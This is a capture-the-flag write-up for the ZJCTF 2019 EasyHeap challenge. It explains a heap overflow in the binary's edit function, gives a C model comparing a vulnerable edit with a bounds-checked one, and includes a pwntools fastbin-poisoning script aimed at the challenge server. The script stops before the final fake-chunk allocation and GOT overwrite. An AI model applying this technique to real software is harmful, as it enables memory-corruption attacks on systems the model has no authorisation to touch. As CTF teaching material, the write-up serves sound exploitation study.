
heap2-[ZJCTF 2019]EasyHeap


Start with checksec to pick the attack vector: Partial RELRO -> the GOT is writable, so overwriting a GOT entry is on the table.


Menu-driven challenge, so go straight to delete and check whether it leaves a UAF.


No UAF: the pointer is cleared after free.


The vulnerability is in edit_heap instead.

This looks as if it lets you change the chunk's size, but the size you enter is only used as the length limit on your input, not checked against the allocation. That is the heap overflow: pass a very large size and we can write as far past the chunk as we like.


On top of that the program is written carelessly: the overflow lets you overwrite the next chunk's metadata (its size field and, once it is freed, its fastbin fd).
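To make the edit_heap bug concrete, here is an added C model (not code from the challenge or the original writeup). It lays out two adjacent 0x70 chunks the way two malloc(96) calls do, implements the vulnerable edit beside a hardened one that honours the recorded size, and applies the same payload the exploit uses: 13 zero qwords to fill chunk 0, then 0x71 for chunk 1's size and 0x6020ad for its fd. The heap region, heaparray and heapsize bookkeeping are constructed for illustration; fastbin_index follows glibc's 64-bit formula.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two adjacent chunks as malloc(96) produces them: 0x70 bytes each,
 * 0x68 usable (the next chunk's prev_size field is reused as data).
 * Constructed in-memory model, not the challenge binary. */
#define CHUNK_SZ 0x70
#define USABLE   (CHUNK_SZ - 8)

static uint8_t  heap[2 * CHUNK_SZ];   /* simulated heap region */
static uint8_t *heaparray[2];         /* user pointers, like the binary's heaparray */
static size_t   heapsize[2];          /* sizes recorded when the chunks were created */
static uint8_t  payload[128];         /* built by build_payload() */

static void     put64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }
static uint64_t get64(const uint8_t *p)       { uint64_t v; memcpy(&v, p, 8); return v; }

/* Lay out chunk 0 (in use) and chunk 1 (freed into the 0x70 fastbin, fd = NULL). */
static void init_heap(void) {
    memset(heap, 0, sizeof heap);
    for (int i = 0; i < 2; i++) {
        uint8_t *chunk = heap + i * CHUNK_SZ;
        put64(chunk + 8, CHUNK_SZ | 1);   /* size field with PREV_INUSE set -> 0x71 */
        heaparray[i] = chunk + 0x10;      /* user data starts after prev_size and size */
        heapsize[i] = USABLE;
    }
}

/* Vulnerable edit: the caller-supplied length is the only bound on the write,
 * so a length larger than the allocation runs into the next chunk's metadata. */
static void edit_heap_vuln(int idx, const uint8_t *data, size_t len) {
    memcpy(heaparray[idx], data, len);    /* never compared with heapsize[idx] */
}

/* Hardened edit: refuse anything longer than the size recorded at create time. */
static int edit_heap_safe(int idx, const uint8_t *data, size_t len) {
    if (len > heapsize[idx]) return -1;
    memcpy(heaparray[idx], data, len);
    return 0;
}

/* glibc's 64-bit fastbin_index: chunk size -> fastbin slot (0x70 -> 5). */
static unsigned fastbin_index(uint64_t size) {
    return (unsigned)(((size & ~(uint64_t)7) >> 4) - 2);
}

/* Chunk 1's metadata as seen after an edit of chunk 0. */
static uint64_t chunk1_size(void) { return get64(heap + CHUNK_SZ + 8); }
static uint64_t chunk1_fd(void)   { return get64(heap + CHUNK_SZ + 0x10); }

/* The exploit's payload: 13 zero qwords fill chunk 0's 0x68 usable bytes, then
 * chunk 1's size (0x71, unchanged so it stays in the 0x70 fastbin) and its
 * fd, pointed at the fake chunk 0x6020ad in .bss. Returns the payload length. */
static size_t build_payload(void) {
    for (int i = 0; i < 13; i++) put64(payload + 8 * i, 0);
    put64(payload + 8 * 13, 0x71);
    put64(payload + 8 * 14, 0x6020ad);
    put64(payload + 8 * 15, 0);
    return 16 * 8;
}

/* Fresh heap, then edit chunk 0 with the 128-byte payload via the safe or
 * the vulnerable routine; returns the edit's status (0 ok, -1 rejected). */
static int run_edit(int use_safe) {
    size_t n = build_payload();
    init_heap();
    if (use_safe) return edit_heap_safe(0, payload, n);
    edit_heap_vuln(0, payload, n);
    return 0;
}

int main(void) {
    printf("safe edit: %d (fd still 0x%llx)\n", run_edit(1),
           (unsigned long long)chunk1_fd());
    run_edit(0);
    printf("vuln edit: chunk1 size=0x%llx fd=0x%llx (fastbin %u)\n",
           (unsigned long long)chunk1_size(), (unsigned long long)chunk1_fd(),
           fastbin_index(chunk1_size()));
    return 0;
}
```

The hardened edit rejects the 128-byte write outright, while the vulnerable one leaves chunk 1's size as 0x71 and its fd as 0x6020ad, which is exactly the state the next two malloc(96) calls walk through: the first returns chunk 1, the second follows fd to the fake chunk. Because glibc checks that a fastbin chunk's size maps to the bin it came from, the fake chunk's size field must also land in index 5.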

Hence the exploit script (wp):

```python
from pwn import *

sh = remote("node4.buuoj.cn", "26279")

# create chunk 0: malloc(96) -> 0x70 chunk
sh.sendafter('Your choice :', '1\n')
sh.sendafter('Size of Heap : ', '96\n')
sh.sendafter('Content of heap:', '\n')

# create chunk 1, directly adjacent to chunk 0
sh.sendafter('Your choice :', '1\n')
sh.sendafter('Size of Heap : ', '96\n')
sh.sendafter('Content of heap:', '\n')

# free chunk 1 into the 0x70 fastbin
sh.sendafter('Your choice :', '3\n')
sh.sendafter('Index :', '1\n')

# 13 qwords fill chunk 0's 0x68 usable bytes, then chunk 1's size (0x71)
# and its fd, pointed at the fake chunk 0x6020ad
x = p64(0x0) * 13 + p64(0x71) + p64(0x6020ad) + p64(0x0)

# edit chunk 0 with an oversized length: the heap overflow rewrites chunk 1's metadata
sh.sendafter('Your choice :', '2\n')
sh.sendafter('Index :', '0\n')
sh.sendafter('Size of Heap : ', '1000\n')
sh.sendafter('Content of heap : ', x)

# malloc(96) hands chunk 1 back; the fake chunk 0x6020ad is now at the head of the fastbin
sh.sendafter('Your choice :', '1\n')
sh.sendafter('Size of Heap : ', '96\n')
sh.sendafter('Content of heap:', '\n')
```

Details: https://blog.csdn.net/BengDouLove/article/details/105391153?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162731259516780271593086%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162731259516780271593086&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-2-105391153.first_rank_v2_pc_rank_v29&utm_term=BUUCTF+%5BZJCTF+2019%5DEasyHeap&spm=1018.2226.3001.4187